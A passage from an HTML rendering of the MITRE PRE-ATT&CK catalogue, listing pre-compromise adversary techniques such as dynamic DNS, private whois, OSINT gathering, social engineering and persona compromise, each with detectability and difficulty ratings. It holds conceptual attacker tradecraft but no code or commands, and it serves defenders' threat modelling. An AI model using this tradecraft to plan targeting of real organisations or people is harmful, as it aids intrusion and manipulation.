<p>Difficulty for the Adversary explanation: Basic web scripting capability to collect information of interest on users of interest. Requires a compromised web site and the users of interest to navigate there.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1581. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1039">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1039</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_private_whois_services_pre_t1082"><a class="anchor" href="#_private_whois_services_pre_t1082"></a><a class="link" href="#_private_whois_services_pre_t1082">Private whois services - PRE-T1082</a></h3>
<div class="paragraph">
<p>Every domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Algorithmically possible to detect COTS service usage or use of non-specific mailing addresses (PO Boxes, drop sites, etc.)</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commercially available or easy to set up and/or register using a disposable email account.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1582. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1082">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1082</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assign_kits_kiqs_and_or_intelligence_requirements_pre_t1015"><a class="anchor" href="#_assign_kits_kiqs_and_or_intelligence_requirements_pre_t1015"></a><a class="link" href="#_assign_kits_kiqs_and_or_intelligence_requirements_pre_t1015">Assign KITs, KIQs, and/or intelligence requirements - PRE-T1015</a></h3>
<div class="paragraph">
<p>Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1583. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1015">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1015</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_groups_roles_pre_t1047"><a class="anchor" href="#_identify_groups_roles_pre_t1047"></a><a class="link" href="#_identify_groups_roles_pre_t1047">Identify groups/roles - PRE-T1047</a></h3>
<div class="paragraph">
<p>Personnel internally to a company may belong to a group or maintain a role with electronic specialized access, authorities, or privilege that make them an attractive target for an adversary. One example of this is a system administrator. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an adversary to undergo an intensive research process. It is resource intensive or requires special data access. May be easier for certain specialty use cases.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1584. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1047">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1047</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_post_compromise_tool_development_pre_t1130"><a class="anchor" href="#_post_compromise_tool_development_pre_t1130"></a><a class="link" href="#_post_compromise_tool_development_pre_t1130">Post compromise tool development - PRE-T1130</a></h3>
<div class="paragraph">
<p>After compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but development will be performed on their local systems.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Post compromise tool development is a standard part of the adversary&#8217;s protocol in developing the necessary tools required to completely conduct an attack.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1585. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1130">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1130</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_compromise_3rd_party_or_closed_source_vulnerability_exploit_information_pre_t1131"><a class="anchor" href="#_compromise_3rd_party_or_closed_source_vulnerability_exploit_information_pre_t1131"></a><a class="link" href="#_compromise_3rd_party_or_closed_source_vulnerability_exploit_information_pre_t1131">Compromise 3rd party or closed-source vulnerability/exploit information - PRE-T1131</a></h3>
<div class="paragraph">
<p>There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The compromise of unknown vulnerabilities would provide little attack and warning against a defender, rendering it highly challenging to detect.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Finding, attacking, and compromising a 3rd party or closed vulnerability entity is challenging, because those containing the vulnerabilities should be very aware of attacks on their environments have a heightened awareness.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1586. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1131">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1131</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1024"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1024"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1024">Acquire OSINT data sets and information - PRE-T1024</a></h3>
<div class="paragraph">
<p>Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1587. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1024">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1024</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_software_services_pre_t1085"><a class="anchor" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1085"></a><a class="link" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1085">Acquire and/or use 3rd party software services - PRE-T1085</a></h3>
<div class="paragraph">
<p>A wide variety of 3rd party software services are available (e.g., [<a href="https://twitter.com" class="bare">https://twitter.com</a> Twitter], [<a href="https://www.dropbox.com" class="bare">https://www.dropbox.com</a> Dropbox], [<a href="https://www.google.com/docs/about/" class="bare">https://www.google.com/docs/about/</a> GoogleDocs]). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not have visibility over account creation for 3rd party software services.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: 3rd party services like these listed are freely available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1588. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1085">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1085</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_confirmation_of_launched_compromise_achieved_pre_t1160"><a class="anchor" href="#_confirmation_of_launched_compromise_achieved_pre_t1160"></a><a class="link" href="#_confirmation_of_launched_compromise_achieved_pre_t1160">Confirmation of launched compromise achieved - PRE-T1160</a></h3>
<div class="paragraph">
<p>Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Current commercial tools and sensitive analytics can be used to detect communications to command and control servers or data exfiltration.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Certainty of the confirmation of compromise is not guaranteed unless the adversary sees communication to a command and control server, exfiltration of data, or an intended effect occur.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1589. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1160">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1160</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1044"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1044"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1044">Identify job postings and needs/gaps - PRE-T1044</a></h3>
<div class="paragraph">
<p>Job postings, on either company sites, or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1590. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1044">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1044</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_or_humint_operation_pre_t1153"><a class="anchor" href="#_conduct_social_engineering_or_humint_operation_pre_t1153"></a><a class="link" href="#_conduct_social_engineering_or_humint_operation_pre_t1153">Conduct social engineering or HUMINT operation - PRE-T1153</a></h3>
<div class="paragraph">
<p>Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Assuming an average company does not train its employees to be aware of social engineering techniques, it is not possible to detect the adversary&#8217;s use unless a highly motivated or paranoid employee informs security. This assessment flips to a 1 in cases of environments where security trains employees to be vigilant or in specialized industries where competitive intelligence and business intelligence train employees to be highly aware. Most likely more complex for an adversary to detect as methods move to physical or non traditionally monitored mechanisms (such as phone calls outside of call centers). Furthermore, the content of such an interaction may be lost due to lack of collection.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Assuming an average adversary whose focus is social engineering, it is not difficult for an adversary. Assuming a HUMINT operation and specialized circumstances, the adversary difficulty becomes 1. Social engineering can be easily done remotely via email or phone. In contrast, HUMINT operations typically would require physical contact at some point in the process, increasing the difficulty.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1591. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1153">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1153</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_software_services_pre_t1107"><a class="anchor" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1107"></a><a class="link" href="#_acquire_and_or_use_3rd_party_software_services_pre_t1107">Acquire and/or use 3rd party software services - PRE-T1107</a></h3>
<div class="paragraph">
<p>A wide variety of 3rd party software services are available (e.g., [<a href="https://twitter.com" class="bare">https://twitter.com</a> Twitter], [<a href="https://www.dropbox.com" class="bare">https://www.dropbox.com</a> Dropbox], [<a href="https://www.google.com/docs/about/" class="bare">https://www.google.com/docs/about/</a> GoogleDocs]). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not have visibility over account creation for 3rd party software services.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: 3rd party services like these listed are freely available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1592. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1107">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1107</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_hardware_software_security_defensive_capabilities_pre_t1071"><a class="anchor" href="#_analyze_hardware_software_security_defensive_capabilities_pre_t1071"></a><a class="link" href="#_analyze_hardware_software_security_defensive_capabilities_pre_t1071">Analyze hardware/software security defensive capabilities - PRE-T1071</a></h3>
<div class="paragraph">
<p>An adversary can probe a victim&#8217;s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Analyze network traffic to determine security filtering policies, packets dropped, etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1593. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1071">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1071</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dynamic_dns_pre_t1110"><a class="anchor" href="#_dynamic_dns_pre_t1110"></a><a class="link" href="#_dynamic_dns_pre_t1110">Dynamic DNS - PRE-T1110</a></h3>
<div class="paragraph">
<p>Dynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not know at first use what is valid or hostile traffic without more context.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: It is relatively easy to subscribe to dynamic DNS providers or find ways to get different IP addresses from a cloud provider.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1594. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1110">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1110</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_discover_new_exploits_and_monitor_exploit_provider_forums_pre_t1127"><a class="anchor" href="#_discover_new_exploits_and_monitor_exploit_provider_forums_pre_t1127"></a><a class="link" href="#_discover_new_exploits_and_monitor_exploit_provider_forums_pre_t1127">Discover new exploits and monitor exploit-provider forums - PRE-T1127</a></h3>
<div class="paragraph">
<p>An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public source external to the defender&#8217;s organization.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Many public sources exist for this information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1595. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1127">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1127</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120"><a class="anchor" href="#_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120"></a><a class="link" href="#_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120">Choose pre-compromised persona and affiliated accounts - PRE-T1120</a></h3>
<div class="paragraph">
<p>For attacks incorporating social engineering the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: It is relatively easy and low cost to purchase compromised credentials. Mining social media sites offers open source information about a particular target. Most users tend to reuse passwords across sites and are not paranoid enough to check and see if spoofed sites from their persona exist across current social media.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1596. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1120">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1120</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1043"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1043"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1043">Acquire OSINT data sets and information - PRE-T1043</a></h3>
<div class="paragraph">
<p>Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Possible to gather digital intelligence about a person is easily aided by social networking sites, free/for fee people search engines, and publicly available information (e.g., county databases on tickets/DUIs).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1597. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1043">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1043</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_people_of_interest_pre_t1046"><a class="anchor" href="#_identify_people_of_interest_pre_t1046"></a><a class="link" href="#_identify_people_of_interest_pre_t1046">Identify people of interest - PRE-T1046</a></h3>
<div class="paragraph">
<p>The attempt to identify people of interest or with an inherent weakness for direct or indirect targeting to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Common defenses protecting against poor OPSEC practices are traditionally more policy-based in nature rather than technical. Policy-based mitigations are generally more difficult to enforce and track violations, making it more difficult that this technique can be detected by common defenses.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Specialty cases enable an adversary to use key words in order to search social media and identify personnel with poor OPSEC practices who may have access to specialized information which would make them a target of interest. In addition, the open nature of social media leads to a tendency among individuals to overshare, encouraging poor OPSEC and increasing the ease by which an adversary can identify interesting targets.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1598. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1046">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1046</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_external_network_trust_dependencies_pre_t1036"><a class="anchor" href="#_determine_external_network_trust_dependencies_pre_t1036"></a><a class="link" href="#_determine_external_network_trust_dependencies_pre_t1036">Determine external network trust dependencies - PRE-T1036</a></h3>
<div class="paragraph">
<p>Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEgg)Wikipedia (Citation: KGBComputerMe)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This is not easily performed remotely and therefore not a detectable event. If the adversary can sniff traffic to deduce trust relations, this is a passive activity and not detectable.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Determining trust relationships once internal to a network is trivial. Simple tools like trace route can show evidence of firewalls or VPNs and then hosts on the either side of the firewall indicating a different trusted network. Active Directory command line tools can also identify separate trusted networks.</p>
</div>
<div class="paragraph">
<p>If completely external to a network, sniffing traffic (if possible) could also reveal the communications protocols that could be guessed to be a trusted network connection (e.g., IPsec, maybe SSL, etc.) though this is error-prone.</p>
</div>
<div class="paragraph">
<p>With no other access, this is hard for an adversary to do completely from a remote vantage point.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1599. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1036">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1036</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_strategic_target_pre_t1018"><a class="anchor" href="#_determine_strategic_target_pre_t1018"></a><a class="link" href="#_determine_strategic_target_pre_t1018">Determine strategic target - PRE-T1018</a></h3>
<div class="paragraph">
<p>An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 &#174;) (Citation: DoD Cyber 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1600. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1066"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066">Analyze organizational skillsets and deficiencies - PRE-T1066</a></h3>
<div class="paragraph">
<p>Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Job postings and hiring requisitions have to be made public for contractors and many times have the name of the organization being supported. In addition, they outline the skills needed to do a particular job, which can provide insight into the technical structure and organization of a target.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1601. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
